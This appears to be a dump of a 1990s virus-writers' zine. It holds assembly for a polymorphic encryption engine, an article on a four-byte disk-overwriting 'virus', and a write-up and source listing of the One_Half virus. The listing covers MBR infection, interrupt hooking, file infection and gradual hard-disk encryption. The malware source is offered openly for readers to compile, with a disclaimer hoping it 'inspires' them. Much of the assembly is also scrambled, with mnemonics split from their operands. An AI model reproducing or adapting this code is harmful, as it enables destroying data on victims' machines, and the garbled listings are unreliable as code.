stosb retn drop_prefix: cmp al,DSs je dp_x add al,20h stosb dp_x: retn random_g_mem: mov ax,248 call random add ax,offset gb_mem retn orah: cmp [lock_ind],1 jnz ora1 call decision jz ora2 ora1: or ah,6 stosw mov ax,[si].mcm_ofs stosw retn ora2: or ah,[mind] stosw mov ax,[si].mcm_ofs sub ax,[ug] stosw retn COMl macro s0,s1,s2,s3 mov ax,&s0+&s1*100h mov bx,&s2+&s3*100h endm COMh macro d0,d1,d2,d3 mov cx,&d0+&d1*100h mov dx,&d2+&d3*100h call recurser endm


macro s0,s1,s2,s3,d0,d1,d2,d3 mov ax,&s0+&s1*100h mov bx,&s2+&s3*100h mov cx,&d0+&d1*100h mov dx,&d2+&d3*100h call recurser endm cx_size equ 4*3+1 get_random_reg: mov ax,7 call random test al,4 jz grr inc al grr: retn gen_em: call get_random_reg mov [use_reg],al gend: call get_ind cmp al,[use_reg] je gend


mov [indy],al call reg2adr or al,80h mov [mind],al mov [lock_reg],1 mov [lock_ind],2 retn gen_disable: call gen_em mov ax,offset disable_data call gen_c mov al,0CFh stosb retn gen_enable: call gen_em mov ax,offset enable_data call gen_c mov al,0CFh stosb retn gen_c: cld push di mov si,offset buf2 sl: call ax sx: mov byte ptr [si],0ffh pop di mov si,offset buf2 call compiler retn enable_data: mov al,t_reg mov ah,[use_reg] COMh t_stack,0,0,0 mov al,t_reg mov ah,[indy] COMh t_stack,0,0,0 call random0 xchg ax,bx mov al,t_const mov [ug],bx mov cl,t_reg mov ch,[indy] call recurser COMx t_seg,DSs,0,0 COMx t_const,0,0,0 COMl t_mem,DSs,4,0 mov cx,t_mem+100h*CSs mov dx,[__old_1] call recurser COMl t_mem,DSs,6,0 mov cx,t_mem+100h*CSs mov dx,[__old_1] inc dx inc dx call recurser

t_stack,0,0,0 t_seg,DSs,0,0


mov ax,t_mem+256*CSs mov bx,[__engine] COMh t_mem,DSs,4,0 COMx t_seg,CSs,0,0, COMx t_stack,0,0,0, COMl t_stack,0,0,0 mov cl,t_reg mov ch,[indy] call recurser COMl t_stack,0,0,0 mov cl,t_reg mov ch,[use_reg] call recurser aax: mov ax,1000h call random or ah,3 mov bx,ax mov al,t_const mov cl,t_stack dec [lock_reg] call recurser COMx t_seg,CSs,0,0, mov al,t_const mov bx,MK COMh t_stack,0,0,0 retn disable_data: mov al,t_reg mov ah,[use_reg] COMh t_stack,0,0,0 mov al,t_reg mov ah,[indy] COMh t_stack,0,0,0 call random0 xchg ax,bx mov al,t_const mov [ug],bx mov cl,t_reg mov ch,[indy] call recurser COMx t_seg,DSs,0,0 COMx t_const,0,0,0 mov ax,t_mem+100h*CSs mov bx,[__old_1] COMh t_mem,DSs,4,0 mov ax,t_mem+100h*CSs mov bx,[__old_1] inc bx inc bx COMh t_mem,DSs,6,0 COMx t_stack,0,0,0 COMl t_stack,0,0,0 mov cl,t_reg mov ch,[indy] call recurser COMl t_stack,0,0,0 mov cl,t_reg

t_mem,DSs,6,0 t_seg,DSs,0,0

; 0..0fff



t_stack,0,0,0 t_seg,DSs,0,0



mov ch,[use_reg] call recurser retn gen_engine: cld call gen01 jmp pushq mk1: jmp gen02 mk6: retn get_ind:mov ax,3 call random jnz g1x sub al,2 g1x: add al,5 retn gen01: call get_ind mov [i0],al g1a: call get_ind cmp [i0],al je g1a mov [i1],al call get_ind mov [i2],al call decision mov [s0],al retn pushq: mov [sp1],sp mov dx,sp sub ah,ah cld mov si,offset i0 mov cl,100h-3 pq0: lodsb or al,50h call isin je pq6 push ax pq6: inc cl jnz pq0 pq2: mov al,[si] call seg_push add al,6 push ax mov bx,sp mov dx,[sp1] sub dx,bx call chaos mov si,[sp1] pq3: dec si dec si mov al,ss:[si] stosb cmp si,sp jne pq3 jmp mk1


popq: pq5: pop ax inc al test al,40h jz pq4 add al,7 pq4: stosb cmp [sp1],sp jne pq5 jmp mk2

gen02: mov [sp2],sp xor si,si mov cl,100h-4 push si push si g2a: push si lodsw inc cl jnz g2a mov ax,5 call random add ax,2 xchg cx,ax g2b: mov ax,7 call random push ax dec cx jnz g2b mov bx,sp mov dx,[sp2] sub dx,bx call chaos mk3: mov si,offset buf2 mov al,[i0] mov [use_reg],al mov ax,t_seg+100h*CSs mov cl,al mov ch,DSs call recurser mov ch,[i1] mov [use_reg],ch mov ch,[i0] mov cl,t_reg mov ax,t_reg+4*256 call recurser mov ch,[i1] mov ax,t_mem+100h*CSs mov bx,[__oldptr] mov cl,t_reg call recurser mov byte ptr [si],0ffh mov si,offset buf2 call compiler


mov [ec_new],di mov [neg00],0 mov al,[i1] call reg2adr xx2: mov [adr00],al mov al,[s0] mov [seg00],al mov si,sp mov [sp3],si cld xx1: lods word ptr ss:[si] mov [ofs00],al push word ptr [rseed] push word ptr [rseed+2] mov al,[i1] xx3: mov [reg00],al call gen00 cmp si,[sp2] jne xx1 mov [ecn_end],di mov al,[i0] call reg2adr mov ah,byte ptr [sp1] sub ah,byte ptr [sp2] xchg ax,bx call decision jz fuck_1 mov ax,08b36h stosw xchg ax,bx mov bl,[i2] shl bl,3 or al,01000000b or al,bl stosw jmp short fuck_2 fuck_1: mov ax,0ff36h stosw xchg ax,bx or al,070h stosw mov ch,[i2] mov [use_reg],ch mov ax,t_stack mov cl,t_reg mov si,offset buf2 call recurser mov byte ptr [si],0ffh mov si,offset buf2 call compiler fuck_2: mov [dc_new],di mov [neg00],1 mov al,[i2] call reg2adr



mov [adr00],al mov al,[s0] mov [seg00],al mov si,[sp2] dec si dec si mov ax,ss:[si] mov [ofs00],al pop word ptr [rseed+2] pop word ptr [rseed] mov al,[i2] mov [reg00],al call gen00 cmp si,[sp3] jne xb1 mov ax,[sp2] sub ax,sp add sp,ax mov [dcn_end],di mov ah,[i2] mov [use_reg],ah mov si,offset buf2 mov cx,t_mem+100h*CSs mov dx,[__oldptr] mov al,t_reg call recurser mov byte ptr [si],0ffh mov si,offset buf2 call compiler


jmp popq mk2: mov al,0cfh stosb jmp mk6 gen00: mov ax,4 call random or al,al jnz g0d mov al,2eh jmp g0c g0d: mov al,[seg00] or al,al jnz g0e mov al,26h g0c: stosb g0e: mov ax,tab00size*4 call random and al,0fch mov bx,ax add ax,offset tab00 call ax mov dl,[neg00] test ah,dl jz g0h xor bl,4 mov ax,bx


add call g0h:

ax,offset tab00 ax

and ah,0feh ah,[adr00] bl,offset trg00-offset tab00 g0g dl,[reg00] dl,3 ah,dl g0g: cmp [ofs00],0 jne g0a and ah,03fh stosw jmp g0f g0a: stosw mov al,[ofs00] stosb g0f: cmp bl,offset tim00-offset tab00 jb g0b call random0 stosw g0b: retn or cmp jae mov shl or tab00: db db trg00: db db db db db db tim00: db db db db 0B8h,001h,01000001b,0c3h ; add ,reg 0B8h,029h,01000001b,0c3h ; sub 0B8h,031h,01000000b,0c3h ; xor 0b8h,0f7h,01011000b,0c3h 0b8h,0ffh,01000001b,0c3h 0b8h,0ffh,01001001b,0c3h 0b8h,0d0h,01000001b,0c3h 0b8h,0d0h,01001001b,0c3h 0b8h,0f7h,01010000b,0c3h 0b8h,081h,01110000b,0c3h 0b8h,081h,01000001b,0c3h 0b8h,081h,01101001b,0c3h ; ; ; ; ; ; neg inc dec rol ,1 ror ,1 not

- byte - byte

; xor ; add ,immw ; sub

tab00end tab00size

label equ (offset tab00end-offset tab00)/4

chaos: pusha push ds push ss pop ds mov cx,dx ch0: mov ax,dx call random and al,0feh mov si,ax mov ax,dx call random and al,0feh mov di,ax mov ax,[si+bx] xchg ax,[di+bx] mov [si+bx],ax dec cx jnz ch0 pop ds popa


retn isin: mov add ii1: je cmp je inc inc jmp ii2: ii0: retn seg_push: or al,al jz sp_xx mov al,18h sp_xx: retn reg2adr: sub al,2 cmp al,1 jne r2a mov al,7 r2a: retn pusha si,sp si,16+2 cmp si,dx ii2 ss:[si],ax ii0 si si ii1 inc si popa

getlost_po: add mov mov add mov mov mov pop pop mov mov call onmt:

mov ax,[dcn_end] ax,[b2] [dco_end],ax ax,[dc_new] ax,[b2] [dc_old],ax si,[__old_1] [old1_ofs],si [si+2] [si] ax,[m1] [si+4],ax


gen_preint mov ax,18h call random add al,40h cmp al,50h jb okaa add al,40h mov byte ptr [start_v],al and al,7 cmp al,4 je onmt push cs pop es mov si,offset rcpt mov di,offset safe movsw movsb


mov cx,[bitch] call fake_seg xor di,di xor si,si shr cx,1 rep movsw mov di,cs:[bitch] add di,decr_code mov cx,offset c_aft+1 sub cx,di shr cx,1 rep movsw

call fake_seg xor si,si mov di,offset c_aft mov cx,cs:[__old_1] sub cx,di rep movsb add di,gb_len mov cx,offset start_v sub cx,di rep movsb mov di,offset dil_heap mov cx,dil_len/2 rep movsw call cr_randomize push pop ds retn MORPH: pusha mov di,sp mov cl,0 mov al,0ffh db 'ENGINE OF ETERNAL ENCRYPTION' mov ax,di sub ax,sp add sp,ax popa call push pop ds POWERUP cs cs

mov al,byte ptr [dis_val] mov byte ptr [rcpt],al pre_prepare: call dil_gen mov si,[old1_ofs] push [si] push [si+2] push pop ds cs

mov ax,sp shr ax,4


mov bx,ss add ax,bx add ax,ss_distance mov [empty_seg],ax mov si,[ecn_end] push [si] mov byte ptr [si],0c3h xor ax,ax mov es,ax mov [sp_tmp],sp pusha pusha push TF push cs push offset start_v+1 mov si,[dco_end] mov [oldptr_2],offset pred+1 push offset prepare_re

push 0 push cs push offset rcpt END_offset: iret nop db Maxinst dup (?) endv: heapbeg: block_beg block_len dc_old dco_end old1_ofs disable__ old_ss old_sp old_ip old_cs ent__ bitch dis_val: data_12e: d_beg: rcpt: rcBUF db 8+2 dup (?) UMB_link dw ? UMB_strategy dw ? old_21 d_end: dataend: block: dd ? dw offset block-offset start dw 1 dw offset dc_oldx dw offset dc_oldx dw dw dw dw dw dw offset old1 offset disable ? ? ? ?

dw offset ent_+1 dw 100h retn



dil_len equ 12aeh-1199h+1+4 getlost label prepare_re equ getlost+59h reCRYPT equ getlost+69h dil_heap db dil_len dup (?) ec_new dw ? dc_new dw ? ecn_end dw ? dcn_end dw ? temp_seg dw ? b2 dw ? ; bitch II safe db 3 dup(?) oldptr_2 dw ? m1 dw ? len_add dw ? new_enable db decr_code dup (?) sp_tmp time date buffer create empty_seg hook21 seg00 reg00 adr00 ofs00 neg00 i0 i1 i2 s0 db db db db db db db db db ? ? ? ? ? ? ? dw dw dw db dw dw dw ? ? ? ? ? ? ? ? headerlen dup (?) ? ? ?,?

sp1 dw sp2 dw sp3 dw

use_reg db ? indy db ? mind db ? ug dw ? lock_ind db ? lock_reg db ? temp dw ? buf2 db 400h dup (?) __old_1 __entry __engine __oldptr __ks rseed rtemp dw dw dw dw dw ? ? ? ? ?

dw ?,? dw ?

heapend: temp_buf:


end start

The Ultimate Solution The world smalest virus ever.

Editorial. So dudes here is another kick the ass contribution to our zine. Smalest virus in sa world. Enjoy it and don't get infected. So pay attention on your A: drive. Maybe, you get the feeling the contribution is unreal, but remember this is no AF edition....

So enjoy the article by Vyvojar

Kyjacisko alias Budzogan

Halloa. The smallest virus ever comes. From Slovakia, of course. From Vyvojar, of course. It's so small it can spread oraly. Just tell your friend 8B DE CD 26 and there it is - replicated. Now. The xtra quick intro to writing a virus. All you need is two instructions. First one is variable (polymorphism of fundamental level). So, whether you write 8B DE or B7 01 it doesn't matter that much and the conversation gets more colorful. All you need to get across is to put the right values into right register (the one and only BX). So and one half is done. Press any key to continue... Second instruction is, unfortunatelly, not polymorphic, but it works. It goes CD 26 and simply tells the machine to spread the virus. Virus is now replicated - hopefuly. Extra bonus: it's stealth (a little bit). And heuristics doesn't stand a chance. Possibly it infects archives as well (ZIP, ARJ, RAR etc.) ...

What history tells us. The first attempts to write a short virus date far back. Most of them are overwritting non-TSR tings. There has been a conference (virus-l) on intnet and they concluded the smallest ever was some Trivial.22 chap (gosh, 500% bigger than Kyjacisko). Note for non-Slovak residents: if you don't know what Kyjacisko (Budzogan respectively) means, consult the Slovak embassy near you. If you don't know who Vyvojar is, you are not supposed to read this mag anyway. .

The serious part. Requirements: Works exclusively with MS-DOS, tested with 5.0+ (no win business, folks). Requires 4b free RAM (except for PSP and tings like that). First instruction sets BX register to 100h. You can achieve tis in several different ways. EG mov bx,si (A alternative), mov bh,01 (alt B) etc etc. Second instruction runs int 26h. Now, we need several tings for tis interrupt. Following registers should be set like dis: AL contains disk drive number. ES:BX buffer to be written down. CX number of sectors to be written. DX logical sector number. Dis is all for today.

And now, let's see how did Microsoft set the registers for us. AL = 0 (mostly) ........................... documented BX = AX = 0 (we set to 100h, remember?) ... undocumented CX = FFh .................................. undocumented DX = ES = PSP segment = base address ...... partially documented it should be all safe and clear now.

So the virus writes itself (or in fact 255 sectors) somewhere to the disk A:, where "somewhere" is determined by the PSP value. If a starting sector number of .COM or .EXE file is identical with DX value, such file gets infected. Often people start panicking like "how will it all end, what a bunch of data will be lost or it isn't a 4B virus when it writes 255 sectors etc etc". The answer, my friend is written in the empirical facts of other viruses as well as in the definition of a virus itself.

OK I'm finished and so is the virus. Code you can get from any good BBS or by fax or by a telephone call from a friend. It is also included in the supplement to tis file. The motto of the day. "As WindowsTM get longer, good things get shorter." Vyvojar

Donwload here

The only authentic One_Half source code. Exclusively for the *-zine.
Editorial You may remember the time of its Outbreak. It was horrible, unknown and effective. It encrypted your data. It was One_Half. Still on the scene, still in the wild, still in the wild list. Here comes the source. Disclaimer The code presented below is one of the most successuf virus in the history. It can (under some circumstances) destroy your data. If you compile it, its on you what you 'll do with the exacutable file. We don't care. Guilty for any damage is that asshole, who executes it.

Dear friends some time has already passed since the great days of One Half epidemy.Nevertheless we still hope that a code of this popular virus inspires you also now. A lot of stuff has been written on the subject, so I tink, not many words are necessary about this little creature any more. And, so, here is the original source of One_Half.3577. Vyvojar

OneHalf.3544 OneHalf aka Slovak Bomber aka Explosion II is multipartite resident com'n'exe virus. When infected file is executed, OneHalf infects the MBR of the harddisk. The original contens of MBR 'll be stored on track 0, on in the 8th sector, when we count from the last one. MBR 'll be . altered and the viral body 'll be placed in last 7 sectors of track 0. Then OneHalf looks for last active DOS partition table (or extended patrition table). Then number of first and last sector of this partition 'll be computed and stored at offset 29h in MBR. Starting from this moment, on every system reboot virus subtract this variable by 2 and encrypts 2 cylinders which are pointed by this variable. This means very slow disk encryption. The encrypted areas on disk are decrypted on demand, but only when virus is memory resident. Attempts to remove virus via clean boot and FDISK /MBR are the best way to lost your data. I just forgot to say, that OneHalf is stealth virus. Onehalf infect files on floppy discs and network drives, but not on the local hard drive. This is very good and effective strategy of spreading. We were told, the virus was in the very beginnig planted in the field on 3 computers in university lab. And look - now it is spread world wide.

In the infected file, the virus decryptor is divided into 10 parts, which are spread across whole the infected file. These parts are connected together by 2 types of jumps and of course, there are here some garbage instruction, randomly choosed from 10 possibles.

When one half of the disk is encrypted, virus, depending on the system date and generation prints to the screen following message: Dis is one half. Press any key to continue... The body contains also string "Did you leave the room ?", related to Explosion virus by the same author. Download here


;Dear friends, ;some time has already passed since the great days of One Half epidemy. ;Nevertheless we still hope that a code of this popular virus inspires ;you also now. A lot of stuff has been written on the subject, so I tink, ;not many words are necessary about this little creature any more. ;And, so, here is the original source of One_Half.3577: DOSSEG .MODEL SMALL .STACK 100h Vkod SEGMENT 'kod' ASSUME CS:Vkod,DS:Vkod

stvir LABEL near POCKIL=4 ;virus length in kB DB 05ah owner DW ? DW POCKIL*1024/16-1 DB 00h,00h,00h,'COMMAND',00h ;MCB header DLZVIR=(OFFSET endvir-OFFSET stvir) ;virus length POCSEC=((DLZVIR-1)/512+1) ;number of sectors needed POCINS=10 ;number of instructions DLZINS=10 ;instruction length DLZBUFF=512 ;buffer length DLZZAS=81h ;stack length VRCHOL=(OFFSET endvir+DLZBUFF+DLZZAS) ;top POCTRACK=2 ;track number DLZFNB=64 ;file name max. length strc id DW lpage pages items parps min max vSS vSP flag DB vIP vCS iaddr strc bheader poss posss orprg v16 DW v30 DW v512 STRUC ? DW ? DW ? DW ? DW ? DW ? DW ? DW ? DW ? DB ? ? ;check DW ? DW ? DW ? ENDS



strc <> DW POCINS DUP(?) DW ? ;positions of instructions DB POCINS*DLZINS DUP(?) 16 30 DW


;************ MBOOT ************ sboot: xor bx,bx cli mov sp,7c00h mov ss,bx sti


mov sub mov int shl mov mov sector: mov

ds,bx word ptr ds:0413h,POCKIL cl,6 12h ax,cl dx,0080h es,ax mov cx,0009h ax,(0200h+POCSEC) push es int 13h bootid: mov ax,OFFSET staboot push ax retf eboot LABEL near ;****************************** staboot:mov ds:(4*21h+2),cs mov ax,ds:046ch push ds push cs pop ds mov rnd1,ax ;RNG init mov ax,cs inc ax mov owner,ax ;MCB owner setting mov byte ptr ds:(OFFSET con3+1),00h ;condition for memory call Koppr ;copying of needed routines pop es mov bx,sp push es mov si,es:(bx+OFFSET eboot-OFFSET sboot) zactr: cmp si,500 ;everything encoded ? jbe uznk push si sub si,POCTRACK mov word ptr ds:(OFFSET cdft+2),si ;last track pop si mov ah,08h int 13h jc uznk mov al,cl and al,3fh ;al = number of sectors mov kolzak,al ;number of sectors to encode mov cl,01h mov bh,7eh mov odkzak,bx ;start to encode from mov dl,80h nttrc: dec si call Fromsi push dx nthd: mov ah,02h push ax int 13h pop ax jc perwd call Skramb inc ah push ax int 13h pop ax perwd: jc erwd


test dh,3fh jz tcid dec dh jmp nthd tcid: pop dx cdft: cmp si,100h ;last track ja nttrc jfcor: mov bh,7ch mov es:(bx+OFFSET eboot-OFFSET sboot),si mov ax,0301h mov cx,0001h mov dh,ch int 13h uznk: mov word ptr ds:(OFFSET cnflte+2),si aktcd: sub si,613 ja estne cmp si,-(3*POCTRACK-1) jb estne ;write it out 3x call Prejav

;for condition in res13

estne: mov ax,0201h mov bx,7c00h mov cx,word ptr ds:(OFFSET sector+1) dec cx mov dx,0080h int 13h ;read original boot cli les ax,es:(4*13h) mov word ptr oriv13,ax mov word ptr oriv13+2,es pop es push es les ax,es:(4*1ch) mov word ptr oriv1c,ax mov word ptr oriv1c+2,es pop es push es mov word ptr es:(4*13h),OFFSET res13 mov es:(4*13h+2),cs mov word ptr es:(4*1ch),OFFSET res1c mov es:(4*1ch+2),cs ;hook 13h and timer 1ch sti push bx retf erwd: xor ah,ah push ax int 13h pop ax enthd: inc dh mov ah,dh pop dx push dx cmp ah,dh ja ercor mov dh,ah mov ah,02h push ax int 13h pop ax call Skramb inc ah ;decode last track if error


push ax int 13h pop ax jmp enthd ercor: pop dx inc si jmp jfcor res1c: push ax push ds push es xor ax,ax mov ds,ax les ax,ds:(4*21h) mov word ptr cs:oriv21,ax mov ax,es cmp ax,0800h ja chnp mov word ptr cs:(oriv21+2),ax les ax,cs:oriv1c mov ds:(4*1ch),ax mov ds:(4*1ch+2),es ;unhook 1ch mov ds:(4*21h),OFFSET res21 mov ds:(4*21h+2),cs ;hook 21h chnp: pop es pop ds pop ax DB 0eah ;jump to original 1ch oriv1c DD ? Koppr PROC near mov si,OFFSET zZakoduj mov di,OFFSET Zakoduj mov cx,OFFSET kzZak-OFFSET zZakoduj cld rep movsb ;copy needed routines ret Koppr ENDP Fromsi PROC push ax mov ax,si mov ch,al push cx mov cl,4 shl ah,cl pop cx mov al,3fh and dh,al and cl,al not al push ax and ah,al or dh,ah pop ax shl ah,1 shl ah,1 and ah,al or cl,ah pop ax ret Fromsi ENDP near


mess1 ems1

DB 'Dis is one half.',0dh,0ah,'Press any key to continue ...',0dh,0ah LABEL byte

Prejav PROC near test order,11b ;only generations that are multiple of 4 jnz somewhere_in_town mov cx,OFFSET ems1-OFFSET mess1 mov si,OFFSET mess1 mov ah,0fh int 10h mov bl,07h mov ah,0eh freddey_lives: lodsb int 10h loop freddey_lives xor ah,ah int 16h somewhere_in_town: ret Prejav ENDP ;**************** file part ************** Pmip PROC near push bx DB 0bbh handle1 DW ? ;mov bx,handle1 int 21h pop bx ret Pmip ENDP tInt13 PROC pushf cli DB 09ah toriv13 DD ? ret tInt13 ENDP near

res01: push bp mov bp,sp con2: jmp short r1cn r1cn: cmp word ptr [bp+04h],1234h ja nsyet push ax push bx push ds lds ax,[bp+02h] DB 0bbh rlit DW ? mov word ptr cs:[bx+OFFSET toriv13],ax mov word ptr cs:[bx+OFFSET toriv13+2],ds mov byte ptr cs:[bx+OFFSET con2+1],OFFSET syet-OFFSET r1cn ;set condition pop ds pop bx pop ax syet: and byte ptr [bp+07h],0feh nsyet: pop bp iret ;**************** instalation to memory ******************



dec mov cmp jne

dec mov inc add cmp jb mov mov add shr inc add cmp jb

pop bx pop ax push ax ;ax = PSP ax ds,ax byte ptr ds:[00h],'Z' inchb add ax,ds:[03h] sub ax,(POCKIL*1024)/16-1 ;ax = virus segment mov dx,cs mov si,bx si cl,4 shr si,cl si ;si = paragraph count till beginning dx,si add dx,cs:[bx+OFFSET bheader.min] ;min memory request ax,dx inchb ;not enough room in memory dx,ss si,sp si,3 si,cl si dx,si ax,dx inchb

mov byte ptr ds:[00h],'M' sub word ptr ds:[03h],(POCKIL*1024)/16 mov ds:[12h],ax mov es,ax push cs pop ds inc ax mov word ptr [bx+OFFSET owner],ax mov byte ptr [bx+OFFSET vsetky],0ebh ;infect everywhere mov si,bx xor di,di mov cx,DLZVIR rep movsb push es pop ds call Koppr ;copy needed routines xor ax,ax mov ds,ax cli mov ax,ds:(4*21h) mov word ptr es:oriv21,ax mov ax,ds:(4*21h+2) mov word ptr es:(oriv21+2),ax mov word ptr ds:(4*21h),OFFSET res21 mov ds:(4*21h+2),es sti inchb: jmp aalldn start stsub: next: sub mov LABEL near call next pop si si,OFFSET next [si+OFFSET rlit],si

;relocation in trace


push push cld inc mov xor mov mov mov mov mov int cmp je

es si

word ptr [si+OFFSET order] ;generation byte ptr [si+OFFSET vsetky],74h ;dis is jz ... ax,ax es,ax ax,es:046ch [si+OFFSET rnd1],ax ;init RNG [si+OFFSET zls1+3],ax ;key for HD encoding ax,4b53h 21h ax,454bh palldn

mov ah,52h int 21h mov ax,es:[bx-02h] mov word ptr ds:[si+OFFSET r1cn+3],ax ;limit mov byte ptr ds:[si+OFFSET con2+1],00h ;set condition mov ax,3501h int 21h push bx push es mov ax,3513h int 21h mov word ptr [si+OFFSET toriv13],bx mov word ptr [si+OFFSET toriv13+2],es mov ax,2501h lea dx,[si+OFFSET res01] int 21h lea bx,[si+OFFSET endvir] mov cx,0001h mov dx,0080h push cs pop es pushf pop ax or ah,01h push ax popf mov ax,0201h call tInt13 pushf pop ax and ah,0feh push ax popf pop ds pop dx pushf mov ax,2501h int 21h popf jc pinstm push cs pop ds cmp word ptr [bx+(OFFSET bootid-OFFSET sboot)+1],OFFSET staboot jne ov444 palldn: jmp alldn


ov444: cmp word ptr [bx+180h],072eh je pinstm ;MASTER mboot protection mov ah,08h mov dl,80h call tInt13 jc pinstm and cx,00111111b ;CL = max. sector number mov byte ptr ds:(si+OFFSET znxtsc+2),cl ;for res13 mov [si+OFFSET mxskt],cl and dh,3fh mov [si+OFFSET mxhlv],dh ;max. head number for encoding mov ax,0301h sub cl,POCSEC mov byte ptr ds:(si+OFFSET zr13ds+2),cl ;for condition in int13 mov dx,0080h call tInt13 ;save original mboot jc pinstm push cx push dx push si xchg di,si mov cx,4 add bx,1eeh hlvp: mov al,[bx+04h] cmp al,01h je ptrif cmp al,04h jb chdnn cmp al,06h jbe ptrif chdnn: sub bx,10h loop hlvp pop si pop dx pop cx pinstm: jmp instm ptrif: mov cx,[bx+02h] mov dh,[bx+01h] call zTosi add si,POCTRACK+5 mov [di+OFFSET zactr+2],si xchg ax,si mov cx,[bx+06h] mov dh,[bx+01h] call zTosi mov [di+OFFSET kontr+2],si mov [di+OFFSET stpdb+1],si add ax,si shr ax,1 mov [di+OFFSET aktcd+2],ax pop si pop dx pop cx

;cylinder nearer to the beginning

;cylinder nearer to the end

;cylinder to activate

mov ax,(0300h+POCSEC) xchg bx,si inc cx mov word ptr ds:[bx+OFFSET sector+1],cx call tInt13 jc pinstm lea si,[bx+OFFSET sboot]


lea di,[bx+OFFSET endvir] push di mov cx,OFFSET eboot-OFFSET sboot rep movsb stpdb: mov ax,1234h stosw mov ax,0301h pop bx mov cx,0001h call tInt13 jc pinstm alldn: pop bx aalldn: push pop ds push cs pop es


lea si,[bx+OFFSET orprg] add bx,OFFSET poss mov cx,POCINS ssno: mov di,[bx] push cx mov cx,DLZINS rep movsb pop cx inc bx inc bx loop ssno ;restore code pop es add mov add add add cmp je mov xor bx,((OFFSET bheader-OFFSET poss)-POCINS*2) di,es di,10h [bx].vCS,di [bx].vSS,di

[bx].items,0 ssr4 ds,es:[2ch] si,si lfn: inc si cmp word ptr [si],0000h jne lfn add si,4 xchg dx,si mov ax,3d00h int 21h jc errlp push cs pop ds mov [bx+(OFFSET handle1-OFFSET bheader)],ax mov dx,[bx].iaddr mov ax,4200h call Pmip push es xchg ax,di ssr3: push ax lea dx,[bx+(OFFSET rbuff-OFFSET bheader)] mov cx,[bx].items cmp cx,((OFFSET endvir-OFFSET rbuff)+DLZBUFF)/4 jb ssr1


mov cx,((OFFSET endvir-OFFSET rbuff)+DLZBUFF)/4 ssr1: sub [bx].items,cx push cx shl cx,1 shl cx,1 mov ah,3fh call Pmip jc errlp pop cx pop ax xchg si,dx ssr2: add [si+2],ax les di,[si] add es:[di],ax add si,4 loop ssr2 cmp [bx].items,0 ja ssr3 ;relocation pop es mov ah,3eh call Pmip ssr4: push es pop ds cmp cs:[bx].flag,0 ;is it COM ? jne sEXE mov si,bx mov di,100h mov cx,3 rep movsb pop ax jmp short sCOM sEXE: pop ax cli mov sp,cs:[bx].vSP mov ss,cs:[bx].vSS sti sCOM: jmp dword ptr cs:[bx].vIP errlp: mov ah,4ch ;if error on program loading int 21h rbuff LABEL byte Rnd PROC NEAR mov word ptr cs:(OFFSET povsi+1),si push ax push bx push cx push dx DB 0b9h rnd2 DW 0000h DB 0bbh rnd1 DW ? ;<MOV DX,015Ah MOV AX,4E35h XCHG AX,SI XCHG AX,DX TEST AX,AX JZ r1 MUL BX r1: JCXZ r2 XCHG AX,CX MUL SI ADD AX,CX



XCHG AX,SI MUL BX ADD DX,SI INC AX ADC DX,0000h MOV cs:rnd1,AX MOV cs:rnd2,DX MOV ax,dx pop cx xor dx,dx jcxz rdbz ;division by zero div cx rdbz: pop cx pop bx pop ax pop si push si cmp byte ptr cs:[si],0cch cli neksl: je neksl sti povsi: mov si,1234h RET Rnd ENDP ;*************** mutation **************** kod: DB 1 kodpax: push ax DB 1 kodpcs: push cs DB 1 kodpds: pop ds DB 3 kodmsi: mov si,1100h DB 3 kodmbx: mov bx,1234h DB 2 kodxor LABEL near k01: xor [si],bx DB 4 kodabx: add bx,4567h DB 1 kodisi: inc si DB 4 kodcsi: cmp si,1103h DB 2 jne k01 POCRI=9 randi: nop stc clc sti DB 2eh ;cs: DB 3eh ;ds: cld std cmc Rndi or jz PROC dx,dx rintd near


push si push cx push dx mov cx,dx rinxt: mov si,OFFSET randi mov dx,POCRI call Rnd add si,dx movsb loop rinxt pop dx pop cx pop si rintd: ret Rndi ENDP Mtog PROC near mov ax,dx inc dx ;for all ins. could be before instruction call Rnd sub ax,dx call Rndi xchg dx,ax ;random ins. before instruction rep movsb ;instruction

cmp bx,OFFSET poss+2*9 ;jump ? jne mtnj mov ax,poss[2*5] sub ax,di add ax,OFFSET ibuf sub ax,[bx] ;ax=poss[2*5]-di+OFFSET ibuf-[bx] dec di stosb ;jump to marked instruction mtnj: call ret Mtog ENDP kodd DW DW kodi DW DW DW Rndi ;random ins. after instruction

DW OFFSET kodmbx OFFSET kodxor+1 OFFSET kodabx+1 DW OFFSET kodmsi OFFSET kodxor+1 OFFSET kodisi OFFSET kodcsi+1

;offset of instruction

Kodins PROC near kinxt: lodsw xchg di,ax mov al,dl cmp si,OFFSET kodi+2*2 jnz kint ;conversion when addressing and al,101b cmp al,001b jnz kins mov al,111b kint: jnz mov shl cmp si,OFFSET kodd+2*2 kins ;3 bit shift cl,3 al,cl


or or jmp kins: or kiad: cmp jz cmp jz jmp kiend: Kodins

[di],al al,0c7h short kiad or [di],al al,0f8h and [di],al si,OFFSET kodi kiend si,OFFSET Kodins kiend kinxt ret ENDP

MHeader PROC near fics: mov si,OFFSET kodd kom: mov dx,1000b call Rnd cmp dl,100b ;SP je kom mov bl,dl call Kodins ;encoding of data registers mov si,OFFSET kodi kbxa: mov dx,3 call Rnd add dl,110b cmp dl,08h jne kvf mov dl,011b ;BX kvf: cmp dl,bl je kbxa call Kodins ;encoding of address registers xor mov pnxt1: jne pom: cx,cx di,OFFSET poss cmp cx,9 pnl

;jump ?

mov dx,200 call Rnd sub dx,100 add dx,poss[2*5] cmp dx,0 jl pom cmp dx,DLZHDR jge pom jmp short pl

;return to 5. instruction

pnl: DB 0bah DLZHDR DW 1000 call Rnd pl: jcxz pfirst mov si,OFFSET poss push cx pnxt: lodsw sub ax,dx cmp ax,DLZINS jge pOK cmp ax,-DLZINS jle pOK pop cx




jmp pnxt1 pOK: loop pnxt pop cx pfirst: xchg ax,dx stosw inc cx cmp cx,POCINS jb pnxt1 ;******************************* mov bx,OFFSET poss mov si,OFFSET kod mnxt: mov di,OFFSET ibuf lodsb mov cl,al mov dx,DLZINS-3+1 sub dx,cx ;'cos range is 0 - (DLZINS-1)

